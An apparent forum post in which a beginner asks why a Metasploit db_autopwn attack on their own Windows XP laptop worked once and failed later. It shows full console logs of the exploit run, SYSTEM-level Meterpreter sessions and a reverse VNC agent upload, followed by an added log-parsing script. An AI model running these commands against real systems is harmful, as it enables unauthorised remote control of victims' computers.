Hi all,
I finally managed to pull off a successful attack using Metasploit's autopwn function from a laptop running BT4 r2 against an Acer Aspire One with Windows XP SP3, both connected over Wi-Fi to the same access point.
The problem is that I tried to repeat the attack a few days later (after having shut down both computers) under what I believe were identical conditions to the previous day (only the IPs changed), but the attack did not succeed.
Now, since I work in research as a biochemist at the university, I am used to thinking scientifically,
so, according to the well-known "scientific method", if I run an experiment on day X and obtain certain results, running the same experiment on day Y under the same conditions, I expect to obtain the same results.
Evidently something does not add up... I would like to understand why the second attack, carried out with the same steps, did not work.
I tried autopwn because, being a beginner, I still cannot recognise and interpret the possible vulnerabilities revealed by the nmap scan, let alone decide which exploits should be used against those vulnerabilities...
I know it would be good practice to first understand the vulnerabilities and then decide on the attack based on them... I searched the web, but so far I have only found a few examples about old vulnerabilities and the related exploits, which never worked in my case.
I would like to know whether there is a complete guide (understandable to a newbie ;-)) of the kind:
port X, service Y: use exploits A, B, C.
The most important thing of all:
...I would obviously also like to know whether there is a way to find out which of my autopwn exploits worked (no fewer than 3 sessions were opened) and how they did it.
I am posting here the scenario and the output of both attacks:
Attacker: Samsung R450 with BT4 r2 connected over Wi-Fi to my access point.
Target: Acer Aspire One with Windows XP SP3, XP firewall DISABLED, connected over Wi-Fi to my AP.
first attack:
Code:
ATTACK 1
msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/prova
msf > db_nmap 192.168.0.2 --osscan-guess -sV
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:36 UTC
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 0.33 seconds
msf > db_nmap 192.168.0.2 --osscan-guess -sV -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:37 UTC
[*] Nmap: Nmap scan report for 192.168.0.2
[*] Nmap: Host is up (0.046s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.0.2 00:23:4E:2E:FC:C4 Unknown device
msf > db_autopwn -x -e -p -R great
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (4/101 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.0.2:2869...
......snip.....
[*] (99/101 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.0.2:2869...
[*] (100/101 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.0.2:2869...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] (101/101 [0 sessions]): Waiting on 28 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
[*] Meterpreter session 4 opened (192.168.0.3:32993 -> 192.168.0.2:27406) at Tue May 03 19:48:18 +0000 2011
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
.....snip.....
[*] (101/101 [3 sessions]): Waiting on 1 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 0 launched modules to finish execution...
msf > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:34499 -> 192.168.0.2:32906
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:39483 -> 192.168.0.2:9261
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:32993 -> 192.168.0.2:27406
msf > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??
....snip......
C:\WINDOWS\system32\wuauclt.exe
3396 cmd.exe x86 0 ACER-88B18F6E0B\stefano C:\WINDOWS\system32\cmd.exe
1132 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\DAlZOGPWel.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.3:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "acer-88b18f6e0b"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
meterpreter > exit
second attack:
Code:
ATTACK 2
msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/prova1
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf > db_nmap 192.168.0.7 -sV --osscan-guess -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 11:53 UTC
[*] Nmap: Nmap scan report for 192.168.0.7
[*] Nmap: Host is up (0.41s latency)
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.0.7 00:23:4E:2E:FC:C4 Unknown device
msf > db_autopwn -x -e -p -R great
[*] (1/100 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.0.7:2869...
....snip....
[*] (100/100 [0 sessions]): Waiting on 0 launched modules to finish execution...
msf >
Thanks in advance,
...please be patient (and exhaustive) with newbies!
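The two transcripts above contain enough to see how db_autopwn chose its modules and why the session lines alone do not say which exploit produced them. The following is an added example, not code from the post or from Metasploit: it parses the nmap -sV lines and the autopwn log exactly as they are printed in the post (the embedded sample is a copied subset of the first attack's output), groups the launched modules by target port, flags modules whose platform prefix (linux, unix) cannot apply to the Windows host that nmap identified, and checks whether a session's remote port coincides with any exploited port. The regexes and the "platform prefix" heuristic are this example's own assumptions about the log format.

```python
"""Triage a db_autopwn run from its console log (added example, not from the post).

Input: the '[*] Nmap: ...' service lines and the '[*] (n/N ...): Launching ...' /
'Meterpreter session N opened (...)' lines as pasted in the post above.
"""
import re
from collections import defaultdict

# Constructed sample: lines copied from the first attack in the post (a subset).
NMAP_LOG = """\
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: Service Info: OS: Windows
"""

AUTOPWN_LOG = """\
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (4/101 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.0.2:2869...
[*] (99/101 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.0.2:2869...
[*] (100/101 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.0.2:2869...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
"""

# Assumed line formats, derived from the transcript in the post.
NMAP_PORT_RE = re.compile(r"^\[\*\] Nmap: (\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
NMAP_OS_RE = re.compile(r"^\[\*\] Nmap: Service Info: OS: (\w+)")
LAUNCH_RE = re.compile(r"Launching (exploit/(\w+)/\S+) against ([\d.]+):(\d+)")
SESSION_RE = re.compile(r"session (\d+) opened \(([\d.]+):(\d+) -> ([\d.]+):(\d+)\)")


def parse_nmap(text):
    """Return ({port: {proto, state, service, version}}, os_name_or_None)."""
    services, os_name = {}, None
    for line in text.splitlines():
        m = NMAP_PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            services[int(port)] = {"proto": proto, "state": state,
                                   "service": service, "version": version.strip()}
            continue
        m = NMAP_OS_RE.match(line)
        if m:
            os_name = m.group(1)
    return services, os_name


def parse_autopwn(text):
    """Return (launches, sessions) parsed from the autopwn console output."""
    launches, sessions = [], []
    for line in text.splitlines():
        m = LAUNCH_RE.search(line)
        if m:
            module, platform, ip, port = m.groups()
            launches.append({"module": module, "platform": platform,
                             "target": ip, "port": int(port)})
            continue
        m = SESSION_RE.search(line)
        if m:
            sid, lhost, lport, rhost, rport = m.groups()
            sessions.append({"id": int(sid), "local": (lhost, int(lport)),
                             "peer": (rhost, int(rport))})
    return launches, sessions


def triage(services, os_name, launches):
    """Group launches by port and list the modules whose platform prefix cannot
    match the scanned OS. 'multi' is kept as plausible (it targets several OSes)."""
    per_port = defaultdict(list)
    for launch in launches:
        per_port[launch["port"]].append(launch)
    report = {}
    for port, items in per_port.items():
        svc = services.get(port, {}).get("service", "unknown")
        mismatched = [l["module"] for l in items
                      if os_name and l["platform"] not in ("multi", os_name.lower())]
        report[port] = {"service": svc, "launched": len(items), "os_mismatch": mismatched}
    return report


def session_ports(sessions, launches):
    """The remote port in a 'session opened' line is the payload connection's
    endpoint, not the exploited service; report whether it matches any
    exploited port (here it never does, so the line cannot name the module)."""
    exploited = {l["port"] for l in launches}
    return {s["id"]: (s["peer"][1], s["peer"][1] in exploited) for s in sessions}


if __name__ == "__main__":
    services, os_name = parse_nmap(NMAP_LOG)
    launches, sessions = parse_autopwn(AUTOPWN_LOG)
    for port, row in sorted(triage(services, os_name, launches).items()):
        print(port, row["service"], "launched:", row["launched"],
              "cannot apply to", os_name, ":", len(row["os_mismatch"]))
    print(session_ports(sessions, launches))
```

Run stand-alone it shows that with `-p` autopwn matched modules on port number only (linux and unix web-application exploits were thrown at port 2869, which nmap had already identified as Microsoft HTTPAPI on a Windows host), and that the "session opened" lines carry the payload connection's ports, not the exploited service, so they cannot by themselves tell you which module succeeded; the module a session came from has to be taken from Metasploit's own per-session record rather than from these lines.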